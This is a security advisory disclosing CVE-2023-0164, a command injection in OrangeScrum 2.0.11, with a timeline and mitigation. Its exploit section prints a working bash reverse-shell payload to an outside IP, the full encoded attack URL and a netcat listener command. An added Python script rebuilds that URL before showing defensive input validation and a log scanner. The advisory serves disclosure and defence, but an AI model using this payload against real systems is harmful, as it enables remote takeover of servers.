OrangeScrum 2.0.11 - OS Command Injection via projuniqid
Summary
Name | OrangeScrum 2.0.11 - OS Command Injection via projuniqid |
Code name | |
Product | OrangeScrum |
Affected versions | 2.0.11 |
State | Public |
Release date | 2023-01-16 |
Vulnerability
Kind | OS Command Injection |
Rule | |
Remote | Yes |
CVSSv3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H |
CVSSv3.1 Base Score | 9.9 |
Exploit available | No |
CVE ID(s) | CVE-2023-0164 |
Description
OrangeScrum version 2.0.11 allows an authenticated external attacker to execute arbitrary commands on the server. This is possible because the application passes the attacker-controlled projuniqid parameter of the log_times/download_pdf_timelog endpoint to a system function without sanitising it.
Vulnerability
This vulnerability occurs because the application takes the projuniqid GET parameter from the request and interpolates it into a command that is run through a system function. Because the parameter reaches a shell, the attacker can use command substitution to run any command of their choosing on the server.
Exploit
To exploit this vulnerability, we just need to send the command we want the server to execute through the projuniqid parameter using the $() command-substitution syntax. In this case the command opens a reverse shell to the attacker's server:
$(bash -i >& /dev/tcp/67.205.165.158/3000 0>&1)
When placed in the URL, spaces become + and the & characters must be encoded as %26, otherwise they would be interpreted as query-string separators:
https://retr02332bughunter.orangescrum.com/log_times/download_pdf_timelog?projuniqid=$(bash+-i+>%26+/dev/tcp/67.205.165.158/3000+0>%261)&usrid=&date=&strddt=&enddt=&dt_format=d/m/y&checkedFields=date,usr_name,task_no,task_title,hours,description,start,end,break,billable
Thus, we only have to run nc -lvp 3000 on the attacker's server before sending the request to receive the reverse shell from the victim server.
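As an added illustration that is not part of the advisory and not OrangeScrum code, the Python script below rebuilds the request above with urllib so that the + and %26 in the advisory's URL fall out of the encoding rather than being typed by hand, and then shows the two checks a defender wants: an allowlist validation of projuniqid (the identifier format is an assumption, the advisory does not state it) and a scan of web-server access-log lines for shell metacharacters in the decoded query parameters. The hostname, attacker address and port are the ones shown in the advisory; the log lines are constructed for the example.

```python
"""Added example, not from the advisory or the OrangeScrum code base.

Offence: rebuild the advisory's request with urllib so the encoding is right.
Defence: allowlist-validate projuniqid and hunt for command substitution
in access logs. Host, attacker address and port are the ones the advisory
shows; the projuniqid format and the log lines are assumptions.
"""
import re
import urllib.parse

TARGET = "https://retr02332bughunter.orangescrum.com"  # host from the advisory
ATTACKER_IP = "67.205.165.158"                           # listener from the advisory
ATTACKER_PORT = 3000
CHECKED_FIELDS = ("date,usr_name,task_no,task_title,hours,description,"
                  "start,end,break,billable")


def reverse_shell_payload(ip: str, port: int) -> str:
    """The $() command-substitution payload from the advisory."""
    return f"$(bash -i >& /dev/tcp/{ip}/{port} 0>&1)"


def build_exploit_url(target: str = TARGET, ip: str = ATTACKER_IP,
                      port: int = ATTACKER_PORT) -> str:
    """Assemble the GET request to the vulnerable endpoint.

    quote_plus turns spaces into '+' and '&' into '%26', which is why the
    advisory's URL reads 'bash+-i+>%26'. Leaving '&' raw would make the
    server split the payload into a new query parameter and '0>&1' would
    never reach bash. safe= keeps the characters the advisory leaves literal.
    """
    params = {
        "projuniqid": reverse_shell_payload(ip, port),
        "usrid": "", "date": "", "strddt": "", "enddt": "",
        "dt_format": "d/m/y",
        "checkedFields": CHECKED_FIELDS,
    }
    query = urllib.parse.urlencode(params, safe="/,$()>")
    return f"{target}/log_times/download_pdf_timelog?{query}"


# Assumption: a legitimate projuniqid is an opaque identifier made only of
# letters, digits, '-' and '_'. Anything else is rejected before it can be
# interpolated into a system() call.
PROJUNIQID_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")

# Tokens that let a shell run something other than the intended command.
SHELL_META = ("$(", "`", ";", "|", "&", ">", "<", "\n")


def is_valid_projuniqid(value: str) -> bool:
    return PROJUNIQID_RE.fullmatch(value) is not None


def suspicious_parameters(log_line: str) -> dict:
    """Decode the query string of a combined-format access-log line and
    return {parameter: decoded value} for every value carrying a shell
    metacharacter. Percent-encoded payloads such as %24%28id%29 are caught
    because parse_qs unquotes before the check."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', log_line)
    if not m:
        return {}
    query = urllib.parse.urlsplit(m.group(1)).query
    hits = {}
    for name, values in urllib.parse.parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if any(tok in value for tok in SHELL_META):
                hits[name] = value
    return hits


# Constructed access-log lines: a normal report download, a percent-encoded
# probe, and the advisory's reverse-shell request.
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Jan/2023:10:00:00 +0000] "GET /log_times/download_pdf_timelog'
    '?projuniqid=abc123&usrid=&dt_format=d/m/y HTTP/1.1" 200 1024',
    '10.0.0.9 - - [16/Jan/2023:10:01:00 +0000] "GET /log_times/download_pdf_timelog'
    '?projuniqid=%24%28id%29&usrid= HTTP/1.1" 200 12',
    '10.0.0.9 - - [16/Jan/2023:10:02:00 +0000] "GET '
    + build_exploit_url()[len(TARGET):] + ' HTTP/1.1" 200 12',
]


if __name__ == "__main__":
    print(build_exploit_url())
    for line in SAMPLE_LOG:
        print(suspicious_parameters(line) or "clean", "<-", line.split('"')[1])
```

The log scan decodes before matching on purpose: a rule that greps the raw request line for "$(" misses the percent-encoded probe, while matching on the decoded value catches both it and the advisory's payload. The allowlist is the check the endpoint itself should apply before the parameter reaches any system function.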
Evidence of exploitation
Our security policy
We have reserved the ID CVE-2023-0164 to refer to this issue from now on.
System Information
- Version: OrangeScrum 2.0.11
- Operating System: GNU/Linux
Mitigation
There is currently no patch available for this vulnerability. Until one is released, the projuniqid parameter should not reach a shell unescaped: validate it against an allowlist of identifier characters and wrap any value that must be passed to a system function with escapeshellarg().
Credits
The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.
References
Vendor page https://github.com/Orangescrum/orangescrum/
Timeline
2023-01-10
Vulnerability discovered.
2023-01-10
Vendor contacted.
2023-01-10
Vendor replied acknowledging the report.
2023-01-10
Vendor confirmed the vulnerability.
2023-01-16
Public Disclosure.